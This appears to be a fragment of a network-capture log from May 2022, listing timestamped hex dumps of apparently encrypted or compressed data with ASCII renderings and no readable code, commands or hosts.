                                                                                                                          2022-05-21 07:30:56 UTC129INData Raw: 0b 34 c9 85 57 69 b2 bf 67 2d f0 f9 e3 8d 04 ed 4a a3 47 ae d0 f5 bc 5c 79 f4 e6 b7 ce 7c 48 9b e2 b3 81 ab b1 bf 4c b2 91 a8 65 ad af ec 28 7d f0 ae cd 82 e5 2a d1 ed a2 39 c2 af e2 2e aa eb ee 9a 93 6e f9 7c 18 5c 9e 52 7a 03 f3 0f d2 c1 3d 2b e0 6d 2e e4 29 a4 e4 ed 04 8d 68 e1 cd 8b 6c ae d5 f2 4d 69 b6 7f db d7 da 9b e6 5d 5d de d2 6e 90 99 3a f4 e7 28 63 6f 24 29 62 e5 3d 40 8c 0e d2 72 3b 3c 01 f2 c1 b0 f6 63 95 01 f7 6b 60 6d 65 eb e5 ab a5 ec f1 cd 36 65 94 a9 8c 9a e4 21 6e 29 66 29 a8 5a 4d 6f c3 2c 91 7e 37 3f 63 2d 7a 41 37 0a 1f dc 5d 4e bc 37 a1 e5 e4 13 23 9b e1 08 bb 05 a6 b7 58 0a 97 5e 17 f2 8b be 50 51 20 20 66 e1 fd b8 62 97 62 e2 d9 62 9c a9 50 e7
                                                                                                                          Data Ascii: 4Wig-JG\y|HLe(}*9.n|\Rz=+m.)hlMi]]n:(co$)b=@r;<ck`me6e!n)f)ZMo,~7?c-zA7]N7#X^PQ fbbbP
                                                                                                                          2022-05-21 07:30:56 UTC129INData Raw: b1 fc a5 6a 16 bb d8 7a 2a 3a 75 73 5d a6 fb 7f e7 84 60 e7 ab 44 05 81 ad 09 1a 97 4f 47 87 75 39 4e 30 71 f5 6b 3b 22 3c bd 53 9f c8 c3 fe 33 d2 11 98 de 0e 49 2a 08 e7 ee e7 0b a2 65 8c cd 8d e3 80 9a 97 ac 81 42 2d c5 10 96 c7 ad 02 08 0a a6 c6 64 12 90 00 8f d6 14 21 e7 01 ec 0c 67 51 18 2a e4 2d 98 dc 2e e5 e8 24 1a c5 88 5b 1b d7 24 c2 4f 2a 91 d9 04 ce b3 7e e8 0a 35 d0 95 96 ab 21 c7 ee 00 e8 90 fb 8f ab e6 90 be c6 0d c1 65 c7 4b 1d 13 5c e8 d8 a3 1a b5 86 35 e9 f9 cd 83 e5 47 ca 2e a1 69 8b 6b f9 d7 5c 2c 93 ed dd 72 47 b8 12 03 92 5f fc e7 72 06 84 36 18 ce 43 2b 07 a9 36 98 07 8a 0e 4d 05 66 67 87 8a aa c9 05 87 c7 55 25 ea a0 9d 91 d9 6e 42 2c 4c 25 54 1f 5c e4 87 3f 63 23 d9 1f ac 7e cc 72 cb c0 07 2c 88 09 6d aa c0 07 a4 89 1a 9c 0e 2d 39
                                                                                                                          Data Ascii: jz*:us]`DOGu9N0qk;"<S3I*eB-d!gQ*-.$[$O*~5!eK\5G.ik\,rG_r6C+6MfgU%nB,L%T\?c#~r,m-9
                                                                                                                          2022-05-21 07:30:56 UTC133INData Raw: aa 13 24 58 6e 36 d0 1f a4 d2 8b a7 be 5d 0b ac 3a 86 67 17 cf 83 a7 ea 19 81 18 00 cf 82 b1 fc 3f f2 ba a9 c8 46 3b 3b f7 3b 1e 4f 49 48 a6 e3 73 37 5b cd 7f 13 5a 11 d2 1c d8 d0 20 a8 37 45 74 8e 63 d9 cc c8 0a 87 28 5f 54 23 ae bc f5 2e 6e ad e1 3c 6f f1 ab bb 45 6b 54 fd 7d 9a 2a 31 0c 00 cc c0 a7 6a 81 a2 12 92 ff d2 2b ce 2e 7a a7 6c 7b a9 1f 93 d2 19 23 21 5f 63 75 01 21 e7 79 cb d8 a4 12 4a 29 34 22 26 1a 1b 2b e2 2f b2 fc 64 b5 78 f2 99 38 00 75 2f 68 61 26 63 cb 93 35 9c ca ff dd 9d a0 e1 b7 5f 06 3f fa e7 f0 08 62 08 58 3f ca 90 f9 13 8c 3c da 65 1d 32 42 10 33 f7 5a ac e6 67 66 ae 41 db a2 56 8c 70 96 00 fd 6e d2 90 ff 96 2e 7d 4e 6b 34 fa a8 d2 14 64 cb 37 9c a9 16 15 cc 37 5a db d8 63 a6 3f fd d2 e0 71 4e e3 dc 92 a0 d2 11 0a c7 67 cd 37 d9
                                                                                                                          Data Ascii: $Xn6]:g?F;;;OIHs7[Z 7Etc(_T#.n<oEkT}*1j+.zl{#!_cu!yJ)4"&+/dx8u/ha&c5_?bX?<e2B3ZgfAVpn.}Nk4d77Zc?qNg7
                                                                                                                          2022-05-21 07:30:56 UTC135INData Raw: 7f b3 73 57 83 06 57 c2 48 96 e4 a9 3c 73 bc 10 4d e6 a5 32 dd 4c bd f3 e4 a0 ac 37 b1 2d aa 36 d6 46 be 9b 42 67 84 b8 5a 62 80 4b a8 44 84 73 56 6a 4f 6b 77 ba 1f b4 c8 67 e6 cf 47 67 a3 26 4b c2 be 9b 88 ad 84 ae 44 4d 38 db 89 01 ef 73 56 20 05 49 e3 06 a9 2b 78 a3 f8 44 84 67 42 03 26 7a 50 89 b3 0c 43 f5 ba 7a aa 8f 13 36 b7 1d ca e5 01 ee 55 32 ba 7a aa 8f 74 52 b4 77 af 7f 10 fd 9b 76 b6 66 42 94 b1 7a 50 89 b3 5d 8f 68 ba 7a aa 8f ba 9e 1c 69 79 36 90 e3 01 a3 cc ec ab 1a dd 66 42 52 1f 02 b7 2b f9 60 b2 b3 63 77 b7 67 42 e9 63 c5 b7 ab 72 7e 13 c3 ba 7a a0 85 1c b3 ad e3 8f 45 ec 3f 34 6f 28 68 2e 28 0e 03 a0 87 27 b9 5f 3a 75 af bc 04 b3 08 82 89 63 6d a3 84 03 9d 2b be 50 be 62 26 24 a5 a0 6e 49 b2 3c 7a 0f 62 7c af 8f 80 65 4a 40 bf 12 ca a3
                                                                                                                          Data Ascii: sWWH<sM2L7-6FBgZbKDsVjOkwgGg&KDM8sV I+xDgB&zPCz6U2ztRwvfBzP]hziy6fBR+`cwgBcr~zE?4o(h.('_:ucm+Pb&$nI<zb|eJ@
                                                                                                                          2022-05-21 07:30:56 UTC139INData Raw: 63 f6 73 6e db 65 7a 7d a3 44 b6 9f f5 fb 4a 9f f7 27 ba 1d 58 6e fb 4e f2 5a 1c a3 6a 28 1a 87 4a 45 8f f6 18 e9 20 97 72 9c af d1 de 40 77 6d 5d a1 0d c4 b3 6c 90 81 6a 48 2c 19 dc 0d cf f6 f0 a8 ff b7 7a f1 d4 65 30 d2 39 19 a0 c6 69 b2 8f 9b 56 16 35 3a 29 70 41 d9 ae 61 62 6c 08 36 6c 94 7f b7 e9 ed 5c 0e cc 58 a4 6e 66 d6 04 5e 88 19 c4 83 5b b2 7a 9c 97 15 13 fa d2 61 2b c1 c3 44 a0 1b 1e e4 97 6d c7 57 47 52 90 f1 66 b6 94 6d c3 9b ca 94 ed e5 15 0d 48 af 41 84 ca 8a 6f ac e9 a6 82 b7 fc c9 6a 58 a0 fe cf 9e 0b bf d6 f3 0a 4e 65 40 6b 16 c2 b9 e5 1c 59 57 9c c8 a2 7d 14 b3 3e 8b 2a cf 2a 4f a7 11 d9 81 35 fe a9 8c 48 1e 19 a7 ef e2 6a 68 f0 f2 69 8c 8d 08 ca b7 74 34 bf ed eb 67 2b c7 4e 01 91 54 cc a8 74 1c 3e 16 7f f0 78 a7 f9 75 28 aa 65 66 e9
                                                                                                                          Data Ascii: csnez}DJ'XnNZj(JE r@wm]ljH,ze09iV5:)pAabl6l\Xnf^[za+DmWGRfmHAojXNe@kYW}>**O5Hjhit4g+NTt>xu(ef
                                                                                                                          2022-05-21 07:30:56 UTC140INData Raw: 4c 69 f7 3a a8 d2 d0 29 dc ea ab 07 be e9 dc ca 8b 0a 38 1a 0c 23 be 0d ea 12 f5 3c f1 fd 03 99 ed e0 5f 79 53 fe e7 67 24 d0 48 7b 4e 55 36 2d b2 ae fe 9e d2 be f0 1a 5d ea ac 9d 25 a6 95 6b 03 16 f4 94 36 05 61 37 b7 e0 f5 d8 fd d3 6b cf c4 a9 26 a3 f7 bb 63 cf 4e db 0a a7 27 89 15 35 f9 4c 1e 76 3f 73 ff 20 8c 87 05 f3 ca fd da 30 cf 32 94 90 a9 e8 7a c8 9d 6a e7 2a 23 11 9f 28 6a 22 35 e8 f7 d5 58 6a 60 28 42 8a 23 0e c7 6c a1 6a a8 f1 f2 6c 25 2b 6b c8 4d ee ea e4 25 af d7 9b 26 e9 27 08 40 ab 25 ef 9d d1 67 ef 62 a2 69 28 6e 26 b3 18 81 23 ae 6a 2e 6e 6a aa 23 a9 e8 a7 5a a2 d7 6c 66 28 5a 12 a1 ce e3 0d 22 2b 52 2a 55 60 f7 32 af 26 85 06 ad 47 cf 87 7f 1b a5 ec 84 bc 56 fb b5 60 0f 3a 55 60 eb af 36 e8 3e e0 36 ae 03 1b a5 ec 4a 03 ae f0 39 67 ae
                                                                                                                          Data Ascii: Li:)8#<_ySg$H{NU6-]%k6a7k&cN'5Lv?s 02zj*#(j"5Xj`(B#ljl%+kM%&'@%gbi(n&#j.nj#Zlf(Z"+R*U`2&GV`:U`6>6J9g
                                                                                                                          2022-05-21 07:30:56 UTC144INData Raw: 8f a7 e1 d5 e1 6e 69 1f 55 22 1c 46 8b c4 13 7e 92 a4 24 0e e6 e2 c6 7b c7 2b 1e ad 5b c9 cf 22 1a 99 1c 7a 16 3f 70 44 87 c2 8c 69 d5 78 b6 36 67 55 e0 da 12 9e cb 5b 0e d1 69 b2 5b c6 5b c3 0a cc f7 59 e3 53 6a d3 38 7e e0 3a 0f 6f 2d 51 ae 95 e5 6f cb 13 6d a3 31 47 ff e3 b1 3f 37 0b b4 0a 93 86 64 0a 2b 64 e8 f5 bb 4c 01 be 70 db 6a 57 e1 7f d6 66 d7 d2 d7 b3 2a 96 58 54 9f 6f 9f 9f 43 8f 09 c7 e3 ee a3 6d a4 2c eb 71 19 06 0a cd 14 ca 04 d9 6c db 16 99 4a ef 3d 2c 09 20 56 79 ef af 54 94 1c f3 4c 2a a4 06 48 f1 84 9f 74 09 2c a7 72 8e c8 46 a8 a8 c6 27 e6 1e db 16 d8 4a c3 e1 da 03 6f b2 de 9b ef 1e e9 9b d5 92 ec 14 71 9b 4a 79 89 6a b9 f5 6c 48 e0 4c 82 25 ec 61 be 0b 93 f5 72 65 b7 59 0b 53 eb 92 b5 4d 37 cf b5 49 1b 7b cb 9b b4 da 80 23 4d f3 9c
                                                                                                                          Data Ascii: niU"F~${+["z?pDix6gU[i[[YSj8~:o-Qom1G?7d+dLpjWf*XToCm,qlJ=, VyTL*Ht,rF'JoqJyjlHL%areYSM7I{#M
                                                                                                                          2022-05-21 07:30:56 UTC146INData Raw: 16 ad d1 27 43 d5 05 c4 e0 64 56 e0 ce 76 58 e0 c6 96 40 66 a4 6a a7 33 a7 59 cf 81 fa 20 a6 d5 18 1e 61 cb a2 98 3c e7 2f ff 65 b7 21 ed 29 e9 53 47 f4 e3 f2 cb d0 13 1d 58 dc e8 2c 91 d7 12 bd 42 66 6a a7 6a 94 99 ea ad 12 d5 d4 8b 1d ea dd 24 7a f8 c0 1e ad e2 36 1d 2e 03 30 19 c7 71 3f fa 45 1b b7 7b 35 06 59 6d 32 06 d3 a4 3e 3d 61 c7 c2 e4 3f 04 5e fd d0 05 79 d7 5a ec 60 03 ee 3e 14 04 5c ff cb 96 37 0d 1e 25 36 f3 2c b8 f2 ff 27 8b 54 fb fa a5 83 4d 36 88 95 5d d4 55 64 96 d5 26 1d e2 9c 99 ec bc 02 92 a8 c9 fc 9c 77 55 0a 11 9f 2b e2 61 3c 3e 2f 07 02 eb e6 6c 62 29 18 2e 44 cc c2 71 f6 d2 c4 1d a5 6a 26 04 b7 e1 61 d3 d8 37 fa 26 88 46 f5 27 bc 94 6b 13 d4 92 aa e6 35 79 0f e2 87 6a 84 b1 7c bb 55 e1 69 33 30 29 ef 92 db 6e a7 1e c0 91 16 cf a4
                                                                                                                          Data Ascii: 'CdVvX@fj3Y a</e!)SGX,Bfjj$z6.0q?E{5Ym2>=a?^yZ`>\7%6,'TM6]Ud&wU+a<>/lb).Dqj&a7&F'k5yj|Ui30)n
                                                                                                                          2022-05-21 07:30:56 UTC150INData Raw: 16 21 95 f7 fd 5c fd 7f 40 ac 23 29 99 e2 07 df 3a 97 64 ce fb d1 4c 31 fe 16 e0 fe 9a 46 8b 94 22 23 96 b2 d5 38 27 ff 53 8a 26 d2 57 ef a1 0a d9 ae 3d 55 ec 51 31 27 e5 36 ee ef 56 a4 1b cc 36 ae 97 87 0f 84 fb ad 9b 4c e9 17 21 eb 93 ca bb e2 44 89 84 b7 4c 68 6d a2 5d 2d c6 66 9b 60 94 6e 0a 07 d9 33 c0 62 01 af f2 0c b1 62 6f 24 4c 93 fd 00 3b c8 1e 3f 9a dc 62 37 ad b0 de 20 b8 ea 86 ef d2 94 a6 6b af 31 85 f9 fa cf 40 63 24 ed de 5b b3 8c b3 1e f3 61 a7 d6 ab 6d ee 32 4b 02 88 4e e5 43 68 8f 37 c8 ff 92 fd b7 28 39 c0 01 d3 54 e9 d2 37 0d c7 b5 7b b5 51 e0 00 02 05 c4 09 c0 2a e2 08 65 81 42 96 a4 09 7c 63 a3 a9 f9 c4 d6 ae 54 af ba a1 0c 65 c0 23 73 d5 66 19 2b 54 80 89 a1 99 d2 d5 54 d3 d5 ba 04 19 77 a2 42 56 35 c4 58 ab 84 8d a1 b9 fc 23 4e 41
                                                                                                                          Data Ascii: !\@#):dL1F"#8'S&W=UQ1'6V6L!DLhm]-f`n3bbo$L;?b7 k1@c$[am2KNCh7(9T7{Q*eB|cTe#sf+TTwBV5X#NA
                                                                                                                          2022-05-21 07:30:56 UTC154INData Raw: f8 61 e0 10 38 71 44 c5 21 03 2f d1 bc 7a 90 1d dd 01 74 d0 ce 13 76 5a bf a8 64 a8 05 cb d0 17 3c fa 05 c9 25 0b 45 fb 02 bc 45 e7 2a 1a d5 67 1f cb 32 13 6e 19 92 09 d7 8f 5c 16 01 cc a5 6b 30 fb 86 49 e5 1a c8 f7 e7 13 6b 29 71 c8 92 0f f0 6a d1 1b 06 ad 93 3f 22 e9 5d f4 b7 07 3d 13 34 aa b3 d7 d3 0a 30 13 32 71 dc e6 24 90 28 6b d9 e3 de e8 ab 1e a2 ec de c8 8a 7b 4a 92 d6 62 44 38 9d 29 65 af 21 2b 8f 47 a2 6a a7 e3 6f 23 af 34 3a c3 a1 58 c2 87 05 0e 9f c1 de e4 d2 a7 11 65 ed 78 89 15 dd 69 9c 57 b8 71 a5 73 36 b7 f7 68 c3 35 ac 2d dd e6 e4 f0 f9 6e 2d e4 a6 43 8b 7c b2 68 b0 2d f7 6b 05 43 d3 c3 7a 10 dd a7 e1 62 a0 d2 18 e1 dd e4 a5 1d ad 62 e6 a2 68 24 44 8d fa 3b 2c 2f 81 e8 cc 6b a7 ee 23 aa 13 1a 65 ea cd 47 f8 34 64 22 d3 c0 79 0d c8 05 49
                                                                                                                          Data Ascii: a8qD!/ztvZd<%EE*g2n\k0Ik)qj?"]=402q$(k{JbD8)e!+Gjo#4:XexiWqs6h5-n-C|h-kCzbbh$D;,/k#eG4d"yI
                                                                                                                          2022-05-21 07:30:56 UTC157INData Raw: 6e 32 72 b9 12 4c 71 79 c1 5f 08 00 c7 3c 8f 27 f6 6a 94 5b ae 25 f9 22 96 18 77 b1 ef d2 2f 6b cf 63 a7 da e5 5d 52 6a c0 31 14 d5 b7 6b 36 52 95 ae d8 9d 21 6c dd 56 a8 d3 c0 fb c4 49 27 8c 44 d3 cb 4e eb df ba f9 ae 31 c2 42 90 11 f4 e2 62 34 3d e2 a4 0b d7 f7 6b 2a 26 94 e8 d9 25 9a 48 00 c6 96 9e 26 6c 34 e5 1a cf 30 44 d1 fd 3f a6 34 fb b6 27 13 ef 71 f9 14 20 a6 ce 42 f7 d2 dd 05 a5 6a 9b 2a a0 af f2 4e 04 ed 38 a1 1b 26 55 60 6a 2f 1e 03 ba 4f 70 85 ba ed 2d 2b d7 67 dd 59 c8 fb 2d 6b 24 09 4f e1 ec a2 a8 e0 00 19 c6 42 78 ec fa 16 72 df 4e 81 ed 92 17 56 d5 51 f4 c7 2d cb 6d 08 f5 13 46 5a 54 5a a6 5b 86 c3 7f 27 53 d4 56 ca 1f a1 d2 69 b5 f9 5d 3f 8b 1f 35 82 a8 d4 d9 29 dc f8 c2 ea 96 c5 86 4a b8 e1 8c 95 f7 e9 dc db ee 1e 9c a6 dc de 9f 20 1a
                                                                                                                          Data Ascii: n2rLqy_<'j[%"w/kc]Rj1k6R!lVI'DN1Bb4=k*&%H&l40D?4'q Bj*N8&U`j/Op-+gY-k$OBxrNVQ-mFZTZ['SVi]?5)J
                                                                                                                          2022-05-21 07:30:56 UTC161INData Raw: 52 54 13 36 43 66 b9 f4 ad 21 a8 0e 08 c7 02 0f ca aa 7f 5f c2 3e 4d 59 95 e6 94 d7 5f b2 43 ab 1e 64 f2 97 2a c9 86 3c d9 3c 68 be a9 41 f3 5b 3c 99 c3 62 86 6d 47 a8 71 e5 6a 5d 08 64 af 25 0d 79 d6 d5 a7 b0 84 21 e2 47 c8 d8 9f 69 a7 a4 a1 27 20 6d 61 9a 01 a6 39 1c e5 17 fd 83 af 3b 00 cf 42 47 c5 a8 6a f0 d5 0e 00 09 ef 67 de cb 8d 5d 07 aa 0a a2 7a 34 2f 79 f1 e3 b5 3e ef 5d ac df be 41 c3 cc db 4d a1 8d 0a cd 82 52 76 a9 57 55 ae fc 6b ba 64 81 44 ea 7a ba 6e e7 3a e6 c5 4d f3 18 5d b3 6b 37 a8 b2 b7 19 de 29 e0 d4 e8 d3 4a ec c7 79 25 7d 5f 07 53 c6 33 e9 c2 4d ef f7 ad 5f 98 ab 29 f3 93 50 f1 ca 85 d3 f4 a4 dd 48 db 76 ab 3e 26 72 7b c2 8f 51 9c 74 6f a6 b0 36 f3 e2 6a 44 69 0c e2 2f f4 ba e2 19 d7 eb a5 58 1e e6 2b de 1b c5 94 b8 59 64 49 ba 9f
                                                                                                                          Data Ascii: RT6Cf!_>MY_Cd*<<hA[<bmGqj]d%y!Gi' ma9;BGjg]z4/y>]AMRvWUkdDzn:M]k7)Jy%}_S3M_)PHv>&r{Qto6jDi/X+YdI
                                                                                                                          2022-05-21 07:30:56 UTC162INData Raw: 3f ff 07 9a 71 f8 c2 15 b8 49 ab 9b b9 b2 f6 6a 75 e9 67 49 42 14 5a 6a 6b 94 9b e9 5f 8b c9 1e 27 28 46 c1 1c 9b 3b f4 a8 a6 a7 1a ad 47 a6 3c f4 b2 61 37 bc a8 1a 53 ea e1 59 17 24 9c d6 d1 51 2b 14 83 4b fc 0a ae ee e0 2d 4c 8b 84 c9 e7 d4 39 8a 60 67 de f0 ca e2 ad 25 2e 60 6b 9c b7 32 1e 9b b3 33 bd 05 6a 43 b6 5a 3d 37 a9 f4 fa a7 ac 5b b0 32 14 2f 00 4f 6b d2 ce 45 90 54 b0 33 17 ac d1 1e 6d 5f e7 d7 9f 89 38 0c 8b 3d 6f a6 fc dd d5 13 2d 5a 97 68 49 58 9e d9 35 db 27 97 5d 2c 40 99 ee b3 66 bb 61 54 83 67 7b 65 f3 69 c3 c0 61 f6 ae a2 6f f8 01 d5 33 cb 6d cc 6d cc 7c dd 6f a8 dd d1 22 6b d7 39 87 e4 b3 35 e9 4c 9e 02 b1 c9 0f cc 0d 61 f3 cb 37 dc 29 76 84 22 30 73 7f 27 e5 cc 16 c8 5c 8a 18 1f 1d e6 3b 00 58 0e 89 1f 90 e2 c7 27 63 8f 66 ff 3b f6
                                                                                                                          Data Ascii: ?qIjugIBZjk_'(F;G<a7SY$Q+K-L9`g%.`k23jCZ=7[2/OkET3m_8=o-ZhIX5'],@faTg{eiao3mm|o"k95La7)v"0s'\;X'cf;
                                                                                                                          2022-05-21 07:30:56 UTC166INData Raw: c7 f6 92 26 da 16 f0 f8 06 7f f5 b6 12 55 65 69 63 a1 6c 66 ed ff b5 ab e6 27 da fd f4 9a 56 1a 66 58 59 f9 11 a9 48 aa 53 f0 cf 20 fe 6e 7f 1a e4 6b db 8c 54 18 52 d8 04 d2 19 5c fc 58 7d 58 ac d2 90 2e 41 76 e2 27 c5 94 8b 3d f6 d3 fb a3 6d 77 19 7c c4 7a bf 7c bc 7f d2 6f 15 0d 14 d8 ad a4 36 05 ec e7 fa 85 69 b3 5f ab 75 39 e2 08 50 26 84 3e fa 37 9e 08 5e 25 b5 8e a8 8d 6a 4e a8 e9 1b 54 1b fa cc 8b 4f 24 02 66 49 2d b0 13 61 30 39 11 97 89 fc 52 cf 0a 37 99 c4 ee 41 08 c5 4d 89 21 8a 7f c5 14 b3 3a aa 2b a8 49 4f 99 5d df dc 05 81 15 ce 32 ab 1a da 93 ea ec 5d de 26 9a 90 99 12 5b 6e a2 1d c5 9d c8 6c 81 12 d7 40 34 a7 35 a9 42 cb 54 6c 02 72 86 75 e0 9d 21 66 eb 20 84 39 31 4e ae 66 ac 48 d3 7a 77 37 da 11 85 8d bb 24 fb fb f4 8c 94 41 df 32 e1 dc
                                                                                                                          Data Ascii: &Ueiclf'VfXYHS nkTR\X}X.Av'=mw|z|o6i_u9P&>7^%jNTO$fI-a09R7AM!:+IO]2]&[nl@45BTlru!f 91NfHzw7$A2
                                                                                                                          2022-05-21 07:30:56 UTC169INData Raw: 6b 2a c6 5a a6 d3 ad 90 8d 5e 15 5c 60 27 5f 19 84 78 97 db 54 43 bc 89 d6 55 cb 99 37 3b a6 82 20 32 88 8d a7 59 19 9b 74 24 8a 99 31 2d a7 65 34 9a 2e 6e 1f 89 a7 6a dd ab af f9 51 0b 13 dc 86 04 ec d6 1f ea 37 cf 12 f5 77 fb f6 0b 6e 50 63 cc d2 fb 72 24 e8 5a d6 bc 31 d2 6e db 53 ef 93 a2 bc 6c 4c 97 a1 67 69 a4 5a 8c d5 0e e1 48 ce 6f c4 0c ea 20 3d bd 0f 85 c2 03 53 be ab 50 26 b4 e6 79 c0 81 cc 90 fd 67 a3 a3 5a 0f bf 2a 93 0a 88 9e 1d 0f 67 a0 87 51 74 a2 7c cd 06 a9 bb 42 97 0a 44 d3 b0 cc df 9c b8 40 de a6 c2 4a 18 00 d8 01 76 99 14 e6 9a 19 f4 2b ef a4 67 5c d1 c7 4e 6b f1 ae 7e 70 50 ce b9 a5 24 b2 bc 65 fc 84 9d 03 c2 30 c1 c7 a1 10 fc b9 f7 40 b5 7c d0 a5 d9 5c 88 89 5b d0 9a 2e 28 18 a9 42 2f 7e e1 8a 61 49 2d 20 26 7d 19 31 f4 c5 6b 2d 1d
                                                                                                                          Data Ascii: k*Z^\`'_xTCU7; 2Yt$1-e4.njQ7wnPcr$Z1nSlLgiZHo =SP&ygZ*gQt|BD@Jv+g\Nk~pP$e0@|\[.(B/~aI- &}1k-
                                                                                                                          2022-05-21 07:30:56 UTC173INData Raw: 4a 41 66 28 c4 8b 8d b1 19 a4 27 17 26 96 d3 14 26 ac 1a 9a 24 48 56 39 a4 6a 5a 1c 2c ac 3f bf c9 d2 39 41 8f a8 70 bf d4 d0 ea 2e 68 f1 f2 af 28 20 e5 a4 bb 6a a5 6e 9a 00 97 30 8d c2 9f 0d ef 6a 58 e1 d4 a1 4f 38 53 ef 06 33 fe b6 dd e0 d6 e5 d7 7a 4c 22 62 60 20 66 ab 6a 9c 51 5f e6 ed 02 7c 90 f0 c1 2c 92 0c 51 6f c5 a8 6a 2a e7 e1 cc 17 d2 c6 27 9c 6a 58 e9 6a dc a0 1c 30 f9 5c 0c 87 d3 70 e0 73 60 6a eb 39 b2 a7 6a ad 6a 6b ea 3d bc ad ea 41 d1 82 1a 71 ea 42 51 60 d8 1e 2d 51 ef 01 67 f4 82 a6 35 ee 6a 01 b8 eb b1 e4 6e fd 2f e1 fe 31 16 d3 e7 d4 bc f3 3b d1 b4 b4 f5 94 0f 7b e1 59 af 6f ed dd 33 0f 80 b2 fa 04 5d b3 f9 e3 9d ac 11 1c e4 20 ce 19 33 97 f0 e3 35 fc 6f a4 f4 0e 14 db 8a 2f 63 ab 7f 5f 20 9c 0d a6 97 24 eb 00 ed 87 6a bc b1 90 9d 7f
                                                                                                                          Data Ascii: JAf('&&$HV9jZ,?9Ap.h( jn0jXO8S3zL"b` fjQ_|,Qoj*'jXj0\ps`j9jjk=AqBQ`-Qg5jn/1;{Yo3] 35o/c_ $j
                                                                                                                          2022-05-21 07:30:56 UTC175INData Raw: e0 38 aa a5 d8 5f 2a 19 dc 72 67 d2 37 33 0e 91 6a f5 db 4e b8 96 c6 5b 5b 05 82 ea 10 90 7f 7f 2a ae 12 4f 34 20 a3 3f 0e 1d ed 5d 93 95 ee 1c 97 79 91 78 1a c2 b7 7a b7 2b c7 52 bb 62 a2 62 af f2 37 62 9f 2e d6 62 ae 3e c7 88 6e 7c a8 6b 64 9b 27 f3 8a 62 ab 6b a6 6b 4c 21 8a 76 35 5f 03 fb 1d d2 b0 b8 7f a7 63 80 b9 96 aa 66 3a fe 03 d8 04 ca 96 4e 73 a8 04 ca a6 ba 62 75 6d 8e 9d 75 b8 6a b9 bd f4 6c c8 a6 d4 6f a6 0e 96 97 b8 f4 50 9e 3e 07 53 ff 4f e3 53 fb c2 9e 2a 13 53 55 11 9e 29 3d 0b ff fc b0 cb 34 f0 86 7d aa 5b 6c 24 11 a0 4b 51 69 f1 ff af a1 c6 27 58 c3 ef 5b d2 e6 1b ef 42 7d 92 c4 53 55 19 a6 85 84 08 d1 3b f7 4c 94 97 4e 2a e9 43 98 56 3e 0e e6 a4 e6 5f 71 c6 f7 b8 92 52 9f 70 b0 fe d1 4b 29 a1 ad 51 bf f0 9f 44 66 ba 99 a4 8b 5c 8a 5f
                                                                                                                          Data Ascii: 8_*rg73jN[[*O4 ?]yxz+Rbb7b.b>n|kd'bkkL!v5_cf:NsbumujloP>SOS*SU)=4}[l$KQi'X[B}SU;LN*CV>_qRpK)QDf\_
                                                                                                                          2022-05-21 07:30:56 UTC180INData Raw: a7 7e 8d 9f 95 ac 63 cf fa 83 42 9a 16 2c 50 ae 23 2d 4b 20 8d e1 e3 2f be 41 5d f2 7f ae ea 86 c2 ae 1a 13 63 d3 de 8f 82 d7 06 0b 95 3f d0 c7 d9 f5 be 1d ac 77 9b 07 0e 0b 5f f3 c6 e7 da cf da 6a a7 44 69 f3 5a eb 5a 54 4f a4 3a 62 59 60 e9 00 a2 31 c2 97 14 0b 5b 52 7d 41 20 ec 35 78 07 e3 1e b1 70 5e ff d2 ca 7f 37 33 15 b2 1f 85 be c7 46 57 e6 cf 6b 16 1e a8 c4 2a d3 17 2e d5 82 05 d6 5d b4 8a 8c 9a 54 11 44 18 62 ad d5 04 ab 76 43 f7 72 ca d7 3e 33 c5 53 a1 84 42 c9 cf 1c 51 aa 58 cb f9 ca f9 11 7e 3f 6d eb ce fd 2a 5f 82 39 f0 d4 9c 8f 18 7f eb 16 c0 7c ab 5d 80 96 a2 1d b0 6a 20 fc 3c e6 01 4d 43 42 cf 0e 1f ea 53 f1 d4 ba 46 81 6a 0e b7 3c 82 b7 99 60 c6 d7 82 34 ab 3d b5 a7 c5 1f e7 11 a0 3b 2f 63 17 db cf 05 83 5f fa 5a 08 bb 6a d3 13 55 e3 cd
                                                                                                                          Data Ascii: ~cB,P#-K /A]c?w_jDiZZTO:bY`1[R}A 5xp^73FWk*.]TDbvCr>3SBQX~?m*_9|]j <MCBSFj<`4=;/c_ZjU
                                                                                                                          2022-05-21 07:30:56 UTC184INData Raw: 75 6e fe 8d c5 df a2 db ff 26 5e c2 c4 39 d7 0a c1 2c 66 a0 e2 61 26 35 6c 67 63 6b 90 6d 9f 12 8e ea 9e 16 17 9c 91 a8 53 62 5d 98 c9 07 a5 c5 0a 68 1e d2 3a e4 b6 cd 04 fe 37 a9 65 53 d3 2b de 31 0a 94 fa 42 af 65 2d 6d 25 6b 7f 5d 41 bf 3f 3f f6 28 52 58 22 24 cc 8a 50 49 8f ca a6 e1 fc d3 10 16 dc 08 18 6f a6 5b a4 dd c2 c3 72 23 de 46 df 48 d1 4c 34 a8 a2 0e d7 98 75 eb 16 30 a7 eb ae 30 0e 80 4e 48 e5 5e c1 fe 2c e5 dd bb 8e 1e f2 7a 36 d7 5f 8a d9 1f dd 0e b7 65 68 a3 6f da d9 35 e4 e9 08 4c af a7 62 41 54 5b bc d3 7f 3d 7b 3b a7 b8 c0 7e d4 2d 67 6e f2 b4 47 05 2a 8f ef 4a 93 d1 c0 07 ca 17 c1 5a 35 b4 6f 29 b7 2c 7a 92 d8 31 ff d2 80 f2 26 6e 56 a6 1d eb 2a bd 37 81 24 02 e6 4a c6 2b b0 3c e6 64 e8 2b a5 7d c2 58 90 6d bf 10 5c 8f a9 00 df 93 46
                                                                                                                          Data Ascii: un&^9,fa&5lgckmSb]h:7eS+1Be-m%k]A??(RX"$PIo[r#FHL4u00NH^,z6_eho5LbAT[={;~-gnG*JZ5o),z1&nV*7$J+<d+}Xm\F
